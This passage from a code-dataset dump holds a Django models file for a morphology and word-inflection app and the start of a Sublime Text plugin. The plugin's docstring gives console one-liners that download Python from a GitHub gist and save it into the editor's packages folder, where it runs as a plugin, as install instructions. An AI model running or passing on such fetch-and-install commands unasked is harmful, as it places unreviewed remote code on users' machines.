lst[i]):\n num += 1\n return (num & 1) == 1\n\n\ndef middle(a, b):\n return (a[0] + b[0]) / 2, (a[1] + b[1]) / 2\n","repo_name":"vasalf/mammoth-world","sub_path":"W2/helpers/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74631666007","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.functional import cached_property\nfrom django.utils.safestring import mark_safe\n# Create your models here.\n\nimport re\n\nfrom base import models as base_models\nfrom languages import models as lang_models\nfrom base import descriptions,functions\n\ndef combine(list_of_list):\n if len(list_of_list)==0: return []\n if len(list_of_list)==1: \n return [ [x] for x in list_of_list[0] ]\n A=list_of_list[0]\n B=combine(list_of_list[1:])\n ret=[]\n for x in A:\n for y in B:\n ret.append( [x]+y )\n return ret\n\nclass RegexpReplacementManager(models.Manager):\n def update_reverse(self):\n for obj in self.all():\n #if hasattr(obj,\"reverse\"): continue\n RegexpReverse.objects.add_reverse(obj)\n \n def de_serialize(self,data):\n regsub,created=self.get_or_create(pattern=data[\"pattern\"],\n replacement=data[\"replacement\"])\n if \"reverse\" in data:\n rev,created=RegexpReverse.objects.update_or_create(target=regsub,defaults=data[\"reverse\"])\n return regsub\n\n def get_default(self):\n regexp,created=RegexpReplacement.objects.get_or_create(pattern=\"(.+)\",replacement=\"\\\\1\")\n return regexp\n\nclass RegexpReplacement(models.Model):\n pattern=models.CharField(max_length=1024)\n replacement=models.CharField(max_length=1024)\n\n objects=RegexpReplacementManager()\n\n class Meta:\n ordering = [\"pattern\",\"replacement\"]\n #unique_together = [ [\"pattern\",\"replacement\"] ]\n\n def __str__(self):\n return \"%s => %s\" % (self.pattern,self.replacement)\n\n def apply(self,text):\n q=re.sub(self.pattern,self.replacement,text)\n return q\n\n def serialize(self):\n ret={\n \"pattern\": self.pattern,\n \"replacement\": self.replacement,\n }\n \n if hasattr(self,\"reverse\"):\n ret[\"reverse\"]={\n \"pattern\": self.reverse.pattern,\n \"replacement\": self.reverse.replacement,\n }\n\n return ret\n\n class Meta:\n ordering = [\"pattern\",\"replacement\"]\n\n @cached_property\n def num_inflections(self): return self.inflection_set.count()\n\n @cached_property\n def num_derivations(self): return self.derivation_set.count()\n\n @cached_property\n def num_fusion_rules(self): return self.fusionrule_set.count()\n\n\nclass RegexpReverseManager(models.Manager):\n\n def _add_N0(self,target):\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":target.replacement,\n \"replacement\":target.replacement\n })\n return rev\n\n def _add_N1(self,target):\n N=target.replacement.count('\\\\1')\n if N==0:\n print(\"N==0\",N,target)\n return None\n M=target.pattern.count(r'(')\n if M!=1:\n print(\"M!=1\",M,target)\n return None\n base=\"\"\n base_list=[ r'(.+)', r'(.+?)', r'(.)' ]\n for b in base_list:\n M=target.pattern.count(b)\n if M!=1: continue\n base=b\n break\n if not base:\n print(\"B \",base_list,target)\n return\n rev_pattern=target.replacement.replace(r'\\1',base)\n rev_replacement=target.pattern.replace(base,r'\\1')\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":rev_pattern,\n \"replacement\":rev_replacement\n })\n return rev\n \n def _add_N2(self,target):\n N1=target.replacement.count('\\\\1')\n N2=target.replacement.count('\\\\2')\n if N1!=1 or N2!=1:\n print(\"N!=1\",N1,N2,target)\n return None\n\n if target.pattern not in [ '(.+)(.)', '(.)(.+)' ]:\n print(\"P2 \",target)\n\n if target.pattern=='(.+)(.)':\n rev_pattern=target.replacement.replace(r'\\1',r'(.+)').replace(r'\\2',r'(.)')\n else:\n rev_pattern=target.replacement.replace(r'\\2',r'(.+)').replace(r'\\1',r'(.)')\n\n rev_replacement=r'\\1\\2'\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":rev_pattern,\n \"replacement\":rev_replacement\n })\n return rev\n \n def _add_N3(self,target):\n N1=target.replacement.count('\\\\1')\n N2=target.replacement.count('\\\\2')\n if N1>2 or N2>2:\n print(\"N!=2\",N1,N2,target)\n return None\n if target.pattern not in [ '(.+)(.)', '(.)(.+)' ]:\n print(\"P3 \",target)\n \n if target.pattern=='(.+)(.)':\n p1=r'(.+)'\n p2=r'(.)'\n else:\n p1=r'(.)'\n p2=r'(.+)'\n\n if N1==2:\n rev_pattern=target.replacement.replace(r'\\1\\1',r'%s\\1' % p1)\n rev_pattern=rev_pattern.replace(r'\\2',p2)\n else:\n rev_pattern=target.replacement.replace(r'\\2\\2',r'%s\\2' % p2)\n rev_pattern=rev_pattern.replace(r'\\1',p1)\n\n\n rev_replacement=r'\\1\\2'\n rev,created=self.update_or_create(target=target,\n defaults={\n \"pattern\":rev_pattern,\n \"replacement\":rev_replacement\n })\n return rev\n \n\n def add_reverse(self,target):\n N=target.replacement.count('\\\\')\n if N==0:\n rev=self._add_N0(target)\n return\n if N==1:\n rev=self._add_N1(target)\n return\n if N==2:\n rev=self._add_N2(target)\n return\n if N==3:\n rev=self._add_N3(target)\n return\n print(\"N>3 \",N,target)\n return\n\n\nclass RegexpReverse(models.Model):\n target=models.OneToOneField(RegexpReplacement,on_delete=models.CASCADE,related_name=\"reverse\")\n pattern=models.CharField(max_length=1024)\n replacement=models.CharField(max_length=1024)\n\n objects=RegexpReverseManager()\n\n def __str__(self):\n return \"%s => %s\" % (self.pattern,self.replacement)\n\nclass PartOfSpeech(base_models.AbstractName):\n bg_color = models.CharField(max_length=20,default=\"#ffff00\")\n fg_color = models.CharField(max_length=20,default=\"#000000\")\n\n def serialize(self):\n return (self.name, {\n \"bg_color\": self.bg_color,\n \"fg_color\": self.fg_color,\n })\n\n##### Tema\n \nclass TemaArgument(base_models.AbstractName):\n @cached_property\n def num_entries(self):\n return self.temaentry_set.all().count()\n\n \nclass TemaValue(base_models.AbstractName): \n @cached_property\n def num_entries(self):\n return self.temaentry_set.all().count()\n\n @cached_property\n def temas(self):\n T=\"
  • \".join([ d.name for d in Tema.objects.filter(temaentryrelation__entry__value=self).distinct() ])\n return mark_safe(\"
    • \"+T+\"
    \")\n\nclass TemaManager(models.Manager):\n def by_language(self,lang_pk):\n q_or=models.Q(root__language__pk=lang_pk)\n q_or=q_or|models.Q(derivation__language__pk=lang_pk)\n q_or=q_or|models.Q(fusionrule__fusionrulerelation__fusion__language__pk=lang_pk)\n return self.filter(q_or).distinct()\n \n def by_part_of_speech(self,part_of_speech):\n if type(part_of_speech) is str:\n pos=PartOfSpeech.objects.filter(name=part_of_speech)[0]\n else:\n pos=part_of_speech\n der_qset=Root.objects.filter(part_of_speech=pos).values(\"tema_obj\")\n return self.filter(pk__in=[ x[\"tema_obj\"] for x in der_qset ])\n\n def de_serialize(self,ser):\n name,data=ser\n tema,created=Tema.objects.get_or_create(name=name)\n ok=[]\n for k,v in data[name]:\n attr,created=TemaArgument.objects.get_or_create(name=k)\n val,created=TemaValue.objects.get_or_create(name=v)\n entry,created=TemaEntry.objects.get_or_create(argument=attr,value=val) #,tema=tema)\n entryrel,created=TemaEntryRelation.objects.get_or_create(tema=tema,entry=entry)\n ok.append(entryrel.pk)\n TemaEntryRelation.objects.filter(tema=tema).exclude(pk__in=ok).delete()\n return tema\n\nclass Tema(base_models.AbstractName):\n objects = TemaManager()\n\n class Meta:\n ordering = [ \"name\" ]\n \n def _multidict(self,tlist):\n D={}\n for k,v in tlist:\n if k not in D: \n D[k]=v\n continue\n if type(D[k]) is not set:\n D[k]=set( [D[k]] )\n D[k].add(v)\n return D\n\n def get_absolute_url(self):\n return \"/morphology/tema/%d/\" % self.pk\n \n def build(self):\n kwargs=self._multidict( [ (str(e.argument), str(e.value)) for e in self.temaentryrelation_set.all() ])\n return descriptions.Tema(**kwargs)\n\n def serialize(self):\n return (self.name, [ (str(e.argument), str(e.value)) for e in self.temaentryrelation_set.all() ] ) \n\n @cached_property\n def num_entries(self):\n return self.temaentryrelation_set.all().count()\n \n @cached_property\n def num_roots(self):\n return self.root_set.all().count()\n\n @cached_property\n def num_derivations(self):\n qs_der=Derivation.objects.filter(tema_entry__in=self.temaentryrelation_set.all().values(\"entry\"))\n return qs_der.count()\n\n @cached_property\n def num_fusion_rules(self):\n return self.fusionrule_set.all().count()\n\n @cached_property\n def num_references(self):\n return self.num_roots+self.num_fusion_rules #+self.num_derivations\n\n @cached_property\n def derivations(self):\n qs_der=Derivation.objects.filter(tema_entry__in=self.temaentryrelation_set.all().values(\"entry\"))\n return \"; \".join([ d.name for d in qs_der ])\n\n @cached_property\n def roots(self):\n return \"; \".join([ r.root for r in self.root_set.all() ])\n\nclass TemaEntry(models.Model):\n #tema = models.ForeignKey(Tema,on_delete=models.CASCADE) \n argument = models.ForeignKey(TemaArgument,on_delete=models.CASCADE) \n value = models.ForeignKey(TemaValue,on_delete=models.CASCADE) \n\n def __str__(self):\n return \"%s=%s\" % (str(self.argument),str(self.value))\n\n class Meta:\n ordering=[\"argument\",\"value\"]\n unique_together=[ [\"argument\",\"value\"] ]\n\n @cached_property\n def num_temas(self): return self.temaentryrelation_set.count()\n\n @cached_property\n def num_derivations(self): return self.derivation_set.count()\n\nclass TemaEntryRelation(models.Model):\n tema = models.ForeignKey(Tema,on_delete=models.CASCADE) \n entry = models.ForeignKey(TemaEntry,on_delete=models.CASCADE) \n\n def __str__(self):\n return str(self.entry)\n\n class Meta:\n ordering=[\"entry\"]\n\n @cached_property\n def argument(self): return self.entry.argument\n\n @cached_property\n def value(self): return self.entry.value\n\n\n#####\n \nclass ParadigmaManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n\nclass Paradigma(base_models.AbstractName):\n part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n inflections = models.ManyToManyField(\"Inflection\",blank=True)\n\n objects=ParadigmaManager()\n\n class Meta:\n ordering = [\"name\"]\n\n def get_absolute_url(self):\n return \"/morphology/paradigma/%d/\" % self.pk\n\n @cached_property\n def count_roots(self):\n return Root.objects.filter(stem__derivation__paradigma=self).distinct().count()\n\n @cached_property\n def count_words(self):\n return Word.objects.filter(stem__derivation__paradigma=self).distinct().count()\n\n @cached_property\n def count_stems(self):\n return Stem.objects.filter(derivation__paradigma=self).distinct().count()\n\n @cached_property\n def count_derivations(self):\n return self.derivation_set.count()\n\n @cached_property\n def count_inflections(self):\n return self.inflections.count()\n\n def split_inflections(self,arg_list):\n\n qset=Inflection.objects.filter(paradigma=self)\n kwargs={}\n for k in arg_list:\n kwargs[k]= models.Max(\"description_obj__entries__value__string\",filter=models.Q(description_obj__entries__attribute__name=k))\n qset=qset.annotate(**kwargs)\n\n ret={}\n for infl in qset:\n key=tuple( [ x if x is not None else \"-\" for x in [ getattr(infl,k) for k in arg_list ] ])\n print(key)\n if key not in ret: ret[key]=[]\n ret[key].append(infl)\n return ret\n\nclass Inflection(models.Model):\n dict_entry = models.BooleanField(default=False)\n regsub = models.ForeignKey(RegexpReplacement,on_delete=models.PROTECT) \n description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT)\n\n class Meta:\n ordering = [\"regsub\"]\n\n @cached_property\n def description(self):\n return self.description_obj.build()\n\n def __str__(self):\n if not self.dict_entry:\n return \"%s [%s]\" % (self.regsub,self.description)\n return \"%s [%s] [DICT]\" % (self.regsub,self.description)\n\n @cached_property\n def num_paradigmas(self):\n return self.paradigma_set.count()\n\n def serialize(self):\n return {\n \"dict_entry\": self.dict_entry,\n \"regsub\": self.regsub.serialize(),\n \"description\": self.description_obj.name\n }\n\nclass RootManager(models.Manager):\n\n def de_serialize(self,ser):\n try:\n obj,created=Root.objects.get_or_create(root=ser[\"root\"],\n part_of_speech=ser[\"part_of_speech\"],\n tema_obj=ser[\"tema\"],\n language=ser[\"language\"])\n except Exception as e:\n print(ser)\n raise e\n return obj\n\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n\n def _clean_fused(self,language,root_list=None):\n if root_list is None:\n FusedWordRelation.objects.filter(fused_word__fusion__language=language).delete()\n FusedWord.objects.filter(fusion__language=language).delete()\n return\n fword_list=list(FusedWord.objects.filter(fusedwordrelation__word__stem__root__in=root_list))\n FusedWordRelation.objects.filter(fused_word__in=fword_list).delete()\n for fword in fword_list:\n fword.delete()\n\n def _rebuild_fused(self,language,root_list=None):\n if root_list is None:\n FusedWord.objects.rebuild(language)\n return\n qset=Word.objects.filter(stem__root__in=root_list)\n qset=qset.values(\"inflection__paradigma__part_of_speech\")\n qset=qset.order_by(\"inflection__paradigma__part_of_speech\").distinct()\n fpk_qset=FusionRuleRelation.objects.filter(fusion_rule__part_of_speech__in=qset)\n fpk_qset=fpk_qset.values(\"fusion__pk\")\n fusion_list=Fusion.objects.filter(pk__in=fpk_qset)\n FusedWord.objects.rebuild(language,fusion_list=fusion_list)\n \n def clean_derived_tables(self,language,root_names):\n if root_names:\n root_list=self.filter(language=language,root__in=root_names)\n self._clean_fused(language,root_list)\n else:\n root_list=self.filter(language=language)\n self._clean_fused(language)\n Word.objects.filter(stem__root__in=root_list).delete()\n Stem.objects.filter(root__in=root_list).delete()\n\n def update_derived_tables(self,language,root_names=[],fused=True):\n if not root_names:\n root_list=self.filter(language=language)\n queryset_word=Word.objects.filter(stem__root__language=language)\n queryset_stem=Stem.objects.filter(root__language=language)\n if fused: self._clean_fused(language)\n else:\n root_list=self.filter(language=language,root__in=root_names)\n queryset_word=Word.objects.filter(stem__root__language=language,\n stem__root__in=root_list)\n queryset_stem=Stem.objects.filter(root__language=language,\n root__in=root_list)\n if fused: self._clean_fused(language,root_list)\n\n # phase 1. stems\n der_list=Derivation.objects.filter(language=language)\n ok=[]\n for root in root_list:\n print(\"R\",root,\"(%s)\" % root.part_of_speech)\n for der in der_list:\n if root.part_of_speech != der.root_part_of_speech: continue\n if not (der.tema <= root.tema): continue\n #if not (der.root_description <= root.description): continue\n stem,created=Stem.objects.get_or_create(root=root,derivation=der)\n stem.clean()\n stem.save()\n ok.append(stem.pk)\n queryset_word.exclude(stem__pk__in=ok).delete()\n queryset_stem.exclude(pk__in=ok).delete()\n \n # phase 2. words\n stem_list=queryset_stem.all()\n #par_list=Paradigma.objects.filter(language=language)\n \n ok=[]\n for stem in stem_list:\n print(\" S\",stem,\"(%s)\" % stem.part_of_speech)\n for infl in stem.paradigma.inflections.all():\n word,created=Word.objects.get_or_create(stem=stem,inflection=infl)\n word.clean()\n word.save()\n print(\" W %-20.20s %s\" % (str(word),str(word.description)))\n ok.append(word.pk)\n queryset_word.exclude(pk__in=ok).delete()\n\n # phase 3. fused words\n\n if not fused: return\n\n if not root_names:\n self._rebuild_fused(language)\n return\n self._rebuild_fused(language,root_list)\n\n\nclass Root(models.Model):\n root=models.CharField(max_length=1024)\n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n tema_obj = models.ForeignKey(Tema,on_delete=models.PROTECT) \n part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n # description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT) \n\n objects=RootManager()\n\n class Meta:\n ordering = [\"root\"]\n unique_together = [ [\"language\",\"root\",\"tema_obj\",\"part_of_speech\"] ] #,\"description_obj\"] ]\n\n def __str__(self):\n return \"%s (%s)\" % (self.root,self.part_of_speech)\n\n # @cached_property\n # def description(self):\n # return self.description_obj.build()\n\n @cached_property\n def tema(self):\n return self.tema_obj.build()\n\n def serialize(self):\n return {\n \"root\": self.root,\n \"tema\": self.tema_obj.name,\n # \"description\": self.description_obj.name,\n \"part_of_speech\": self.part_of_speech.name,\n }\n\n def get_absolute_url(self):\n return \"/morphology/root/%d/\" % self.pk\n\n def update_derived(self):\n queryset_word=Word.objects.filter(stem__root=self)\n queryset_stem=Stem.objects.filter(root=self)\n\n # phase 1. stems\n der_list=Derivation.objects.filter(language=self.language,\n root_part_of_speech=self.part_of_speech)\n ok=[]\n for der in der_list:\n if not (der.tema <= self.tema): continue\n #if not (der.root_description <= self.description): continue\n stem,created=Stem.objects.get_or_create(root=self,derivation=der)\n stem.clean()\n stem.save()\n print(\"S\",stem)\n ok.append(stem.pk)\n queryset_word.exclude(stem__pk__in=ok).delete()\n queryset_stem.exclude(pk__in=ok).delete()\n \n # phase 2. words\n stem_list=queryset_stem.all()\n ok=[]\n for stem in stem_list:\n for infl in stem.paradigma.inflections.all():\n word,created=Word.objects.get_or_create(stem=stem,inflection=infl)\n word.clean()\n word.save()\n print(\"W\",word)\n ok.append(word.pk)\n queryset_word.exclude(pk__in=ok).delete()\n\n # phase 3. fused words\n\n #FusedWord.objects.rebuild(language)\n \nclass DerivationManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n\n def de_serialize(self,ser):\n language,name,data=ser\n defaults={}\n for k in [ \"regsub\",\"root_part_of_speech\",\"paradigma\" ]:\n defaults[k]=data[k]\n # for k in [ \"tema\",\"description\" ]:\n for k in [ \"description\" ]:\n defaults[k+\"_obj\"]=data[k]\n\n a,v=data[\"tema_entry\"]\n attr,created=TemaArgument.objects.get_or_create(name=a)\n val,created=TemaValue.objects.get_or_create(name=v)\n entry,created=TemaEntry.objects.get_or_create(argument=attr,value=val) #,tema=tema)\n defaults[\"tema_entry\"]=entry\n der,created=Derivation.objects.update_or_create(name=name,language=language,\n defaults=defaults)\n return der\n\n\nclass Derivation(base_models.AbstractName):\n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n regsub = models.ForeignKey(RegexpReplacement,on_delete=models.PROTECT) \n # tema_obj = models.ForeignKey(Tema,on_delete=models.PROTECT) \n tema_entry = models.ForeignKey(TemaEntry,on_delete=models.PROTECT) \n description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT) \n # root_description_obj = models.ForeignKey(base_models.Description,\n # on_delete=models.PROTECT,\n # related_name=\"root_derivation_set\") \n root_part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n paradigma = models.ForeignKey(Paradigma,on_delete=models.PROTECT)\n\n objects=DerivationManager()\n\n class Meta:\n ordering = ['name']\n\n def serialize(self):\n return (self.name,{\n \"regsub\": self.regsub.serialize(),\n # \"tema\": self.tema_obj.name,\n \"description\": self.description_obj.name,\n # \"root_description\": self.root_description_obj.name,\n \"root_part_of_speech\": self.root_part_of_speech.name,\n \"paradigma\": self.paradigma.name,\n \"tema_entry\": ( str(self.tema_entry.argument), str(self.tema_entry.value) )\n })\n\n @cached_property\n def num_stem(self):\n return self.stem_set.count()\n\n @cached_property\n def description(self):\n return self.description_obj.build()\n\n @cached_property\n def part_of_speech(self):\n return self.paradigma.part_of_speech\n\n # @cached_property\n # def root_description(self):\n # return self.root_description_obj.build()\n\n @cached_property\n def tema(self):\n kwargs=dict( [ (str(self.tema_entry.argument), str(self.tema_entry.value)) ])\n return descriptions.Tema(**kwargs)\n\n # @cached_property\n # def num_tema_entries(self):\n # return self.tema_obj.num_entries\n\n def clean(self):\n if self.language != self.paradigma.language:\n raise ValidationError(_('Paradigma and language are not compatible.'))\n\n def get_absolute_url(self):\n return \"/morphology/derivation/%d/\" % self.pk\n\nclass FusionManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(language__pk=lang_pk)\n \nclass Fusion(base_models.AbstractName):\n language = models.ForeignKey('languages.Language',on_delete=models.PROTECT) \n objects=FusionManager()\n\nclass FusionRule(base_models.AbstractName):\n regsub = models.ForeignKey(RegexpReplacement,on_delete=models.PROTECT) \n tema_obj = models.ForeignKey(Tema,on_delete=models.PROTECT) \n part_of_speech = models.ForeignKey(PartOfSpeech,on_delete=models.PROTECT) \n description_obj = models.ForeignKey(base_models.Description,on_delete=models.PROTECT) \n\n @cached_property\n def description(self):\n return self.description_obj.build()\n\n @cached_property\n def tema(self):\n return self.tema_obj.build()\n\n @cached_property\n def num_fusions(self):\n return self.fusionrulerelation_set.all().count()\n \n def serialize(self):\n return {\n \"name\": self.name,\n \"regsub\": self.regsub.serialize(),\n \"tema\": self.tema_obj.name,\n \"description\": self.description_obj.name,\n \"part_of_speech\": self.part_of_speech.name,\n }\n\n\nclass FusionRuleRelation(models.Model):\n fusion = models.ForeignKey(Fusion,on_delete=models.CASCADE) \n fusion_rule = models.ForeignKey(FusionRule,on_delete=models.CASCADE) \n order = models.IntegerField()\n\n def __str__(self):\n return \"%s/%s(%d)\" % (self.fusion,self.fusion_rule,self.order) \n\n class Meta:\n ordering = [ \"order\" ]\n\nclass StemManager(models.Manager):\n def by_language(self,lang_pk):\n return self.filter(root__language__pk=lang_pk)\n\nclass Stem(models.Model):\n root = models.ForeignKey(Root,on_delete=models.CASCADE) \n derivation = models.ForeignKey(Derivation,on_delete=models.CASCADE) \n cache=models.CharField(max_length=1024,db_index=True,editable=False)\n\n objects=StemManager()\n \n class Meta:\n ordering = [\"cache\"]\n\n def __str__(self): return self.cache\n\n def clean(self):\n if self.root.language != self.derivation.language:\n raise ValidationError(_('Root and derivation are not compatible (language).'))\n if self.root.part_of_speech != self.derivation.root_part_of_speech:\n raise ValidationError(_('Root and derivation are not compatible (part of speech).'))\n dtema=self.derivation.tema\n rtema=self.root.tema\n if not dtema<=rtema: \n raise ValidationError(_('Root and derivation are not compatible (tema).'))\n # ddesc=self.derivation.root_description\n # rdesc=self.root.description\n # if not ddesc<=rdesc: \n # raise ValidationError(_('Root and derivation are not compatible (description).'))\n # if self.status == 'published' and self.pub_date is None:\n # self.pub_date = datetime.date.today()\n self.cache=self.derivation.regsub.apply(self.root.root)\n\n \n @cached_property\n def description(self): return self.derivation.description\n # ddesc=self.derivation.description\n # #rdesc=self.root.description\n # return ddesc+rdesc\n\n @cached_property\n def stem(self): return self.cache\n\n @cached_property\n def tema(self): return self.root.tema\n\n @cached_property\n def paradigma(self): return self.derivation.paradigma\n\n @cached_property\n def language(self): return self.derivation.language\n\n @cached_property\n def part_of_speech(self): return self.derivation.paradigma.part_of_speech\n\n @cached_property\n def dictionary_voice(self):\n return \", \".join([str(w) for w in self.word_set.filter(inflection__dict_entry=True)])\n \nclass WordManager(models.Manager): pass\n\nclass Word(models.Model):\n stem = models.ForeignKey(Stem,on_delete=models.CASCADE) \n inflection = models.ForeignKey(Inflection,on_delete=models.CASCADE) \n cache=models.CharField(max_length=1024,db_index=True,editable=False)\n\n objects=WordManager()\n\n class Meta:\n ordering = [ \"cache\" ]\n\n def __str__(self): return self.cache\n\n def clean(self):\n if not self.inflection in self.stem.paradigma.inflections.all():\n raise ValidationError(_('Stem and inflection are not compatible (inflection not in paradigma).'))\n self.cache=self.inflection.regsub.apply(self.stem.stem)\n\n @cached_property\n def description(self):\n try:\n idesc=self.inflection.description\n sdesc=self.stem.description\n return idesc+sdesc\n except descriptions.FailedUnification as e:\n return descriptions.Description(failed=str(e))\n\n @cached_property\n def tema(self): return self.stem.tema\n\n @cached_property\n def part_of_speech(self): return self.stem.part_of_speech\n \n @cached_property\n def dict_entry(self): return self.inflection.dict_entry\n\n @cached_property\n def paradigma(self): return self.stem.paradigma\n\n @cached_property\n def language(self): return self.stem.language\n\n\nclass FusedWordManager(models.Manager):\n\n\n ### QUI\n def _reduce_word_list(self,part_of_speech,tema,description):\n \"\"\" This function is just a performance booster, not a perfect filter,\n and retrieves more words than necessary (but still not all\n words).\n \"\"\"\n\n qset=Word.objects.filter(stem__derivation__paradigma__part_of_speech=part_of_speech) \n for arg in tema:\n if tema[arg] not in [list,set]:\n qtentry=TemaEntryRelation.objects.filter(entry__argument__name=arg,entry__value__name=tema[arg])\n qset=qset.filter(stem__root__tema_obj__in=[x[\"tema\"] for x in qtentry.values(\"tema\")])\n continue\n for val in tema[arg]:\n qtentry=TemaEntryRelation.objects.filter(entry__argument__name=arg,entry__value__name=val)\n qset=qset.filter(stem__root__tema_obj__in=[x[\"tema\"] for x in qtentry.values(\"tema\")])\n\n for arg in description:\n if isinstance(description[arg],descriptions.Description): continue\n if type(description[arg]) is tuple:\n if description[arg][1]: continue\n val=description[arg][0]\n else:\n val=description[arg]\n qentry=base_models.Entry.objects.filter( models.Q(attribute__name=arg,\n value__string=val,invert=False) )\n desc_list=[x[\"description\"] for x in qentry.values(\"description\")] \n # query= models.Q(stem__derivation__description_obj__in=desc_list) | \\\n # models.Q(stem__root__description_obj__in=desc_list) | \\\n # models.Q(inflection__description_obj__in=desc_list) \n query= models.Q(stem__derivation__description_obj__in=desc_list) | \\\n models.Q(inflection__description_obj__in=desc_list) \n qset=qset.filter(query)\n return qset\n\n\n def rebuild(self,language,fusion_list=[]):\n # FusedWordRelation.objects.filter(fused_word__fusion__language=language).delete()\n # self.filter(fusion__language=language).delete()\n # fusion_list=Fusion.objects.filter(language=language)\n if not fusion_list:\n fusion_list=Fusion.objects.filter(language=language)\n\n FusedWordRelation.objects.filter(fused_word__fusion__in=fusion_list).delete()\n self.filter(fusion__in=fusion_list).delete()\n\n ok=[]\n for fusion in fusion_list:\n print(fusion)\n comp=[]\n abort=False\n for rel in fusion.fusionrulerelation_set.all().order_by(\"order\"):\n rule=rel.fusion_rule\n word_list=self._reduce_word_list(rule.part_of_speech,rule.tema,rule.description)\n w_comp=[]\n print(\" rule %s: tema=%s, description=%s\" % (rule,str(rule.tema),str(rule.description) ) )\n print(\" \",word_list)\n for w in word_list:\n if not (rule.tema <= w.tema): continue\n if not (rule.description <= w.description): continue\n w_comp.append(w)\n if not w_comp:\n abort=True\n break\n comp.append( w_comp )\n if abort: continue\n\n comp=combine(comp)\n for w_list in comp:\n print(\" F:\",w_list)\n fword=FusedWord(fusion=fusion)\n fword.save()\n n=0\n for w in w_list:\n fwrel=FusedWordRelation(fused_word=fword,word=w,order=n)\n fwrel.full_clean()\n fwrel.save()\n n+=1\n fword.full_clean()\n fword.save()\n print(\" = %20s\" % fword)\n\nclass FusedWord(models.Model):\n fusion = models.ForeignKey(Fusion,on_delete=models.CASCADE) \n cache = models.CharField(max_length=1024,db_index=True,editable=False)\n objects=FusedWordManager()\n\n def clean(self):\n S=\"\"\n n=0\n for word in [ rel.word for rel in self.fusedwordrelation_set.all().order_by(\"order\") ]:\n rule=self.rules[n]\n #print(\" \",word,rule)\n res=rule.regsub.apply(word.cache)\n print(\" W %20s %20s %20s\" % (word.cache,rule.regsub,res) )\n S+=res\n n+=1\n self.cache=S\n\n def __str__(self): return self.cache\n\n @cached_property\n def rules(self):\n return [ rel.fusion_rule for rel in self.fusion.fusionrulerelation_set.all().order_by(\"order\") ]\n\n @cached_property\n def words(self):\n return [ rel.word for rel in self.fusedwordrelation_set.all().order_by(\"order\") ]\n \n @cached_property\n def description(self): return [ w.description for w in self.words ]\n\n @cached_property\n def tema(self): return [ w.tema for w in self.words ]\n\n @cached_property\n def part_of_speech(self): return [ w.part_of_speech for w in self.words ]\n \n @cached_property\n def language(self): return self.fusion.language\n\n\nclass FusedWordRelation(models.Model):\n fused_word = models.ForeignKey(FusedWord,on_delete=models.CASCADE) \n word = models.ForeignKey(Word,on_delete=models.CASCADE) \n order = models.IntegerField()\n\n def __str__(self):\n return \"%s/%s\" % (self.fused_word.cache,self.word.cache)\n\n def clean(self):\n if self.word.language != self.fused_word.language:\n raise ValidationError(_('Fused word and word are not compatible (language).'))\n rule=self.fused_word.rules[self.order]\n if self.word.part_of_speech != rule.part_of_speech:\n raise ValidationError(_('Rule %d and word are not compatible (part of speech).' % self.order))\n dtema=rule.tema\n rtema=self.word.tema\n if not dtema<=rtema: \n raise ValidationError(_('Rule %d and word are not compatible (tema).' % self.order ))\n ddesc=rule.description\n rdesc=self.word.description\n if not ddesc<=rdesc: \n raise ValidationError(_('Rule %d and word are not compatible (description).' % self.order ))\n\n @cached_property\n def description(self): self.word.description\n\n @cached_property\n def tema(self): return self.word.tema\n\n @cached_property\n def part_of_speech(self): return self.word.part_of_speech\n \n @cached_property\n def language(self): return self.word.language\n","repo_name":"chiara-paci/clotilde","sub_path":"clotildecore/morphology/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":35763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33976693876","text":"# CSW: ignore\nfrom __future__ import print_function, division\nimport sublime\nimport sublime_plugin\nimport os.path\n\n\n\nclass EditSettingsCommand:\n\n def run(self, base_file, user_file=None, default=None):\n\n \"\"\"\n This command is here to help. But it is not the official one, because it uses\n features only available on ST3. So, there might be bugs, and its behavior\n might be different (although I tried to keep it the same)\n\n So, please: Consider swapping for Sublime Text **3**\n\n ## How do I install this?\n\n Easy: paste this into the sublime text console (view -> show console):\n\n for Sublime Text **3**\n\n import os.path,urllib.request,sublime;save_to=os.path.join(sublime.packages_path(),'User','settings.py');page=urllib.request.urlopen('https://gist.githubusercontent.com/math2001/6cd5cbb9d2741654c2e994d33c395729/raw/70ee7e80e1e555990416e57576c1c01c194809f5/settings.py');code=page.read().decode('utf-8');file=open(save_to,'w');file.write(code);file.close();print(\"Voila! Everything's done. Please restart Sublime Text to make sure everything is working\");\n\n for Sublime Text **2**\n\n import os.path, urllib2,sublime;save_to=os.path.join(sublime.packages_path(),'User','settings.py');page=urllib2.urlopen('https://gist.githubusercontent.com/math2001/6cd5cbb9d2741654c2e994d33c395729/raw/70ee7e80e1e555990416e57576c1c01c194809f5/settings.py');code=page.read().decode('utf-8');file=open(save_to,'w');file.write(code);file.close();print(\"Voila! Everything's done. Please restart Sublime Text to make sure everything is working\")\n\n If, for some reason, it is not working, you can just do it in a manual way:\n\n 1. copy the code of this file (all of it)\n 2. in sublime text, go to `Preferences -> browse packages`\n 3. go into the `user` directory\n 4. create a file called `settings.py`\n 5. open it with sublime text, and paste the code\n 6. restart sublime text\n\n\n \"\"\"\n\n 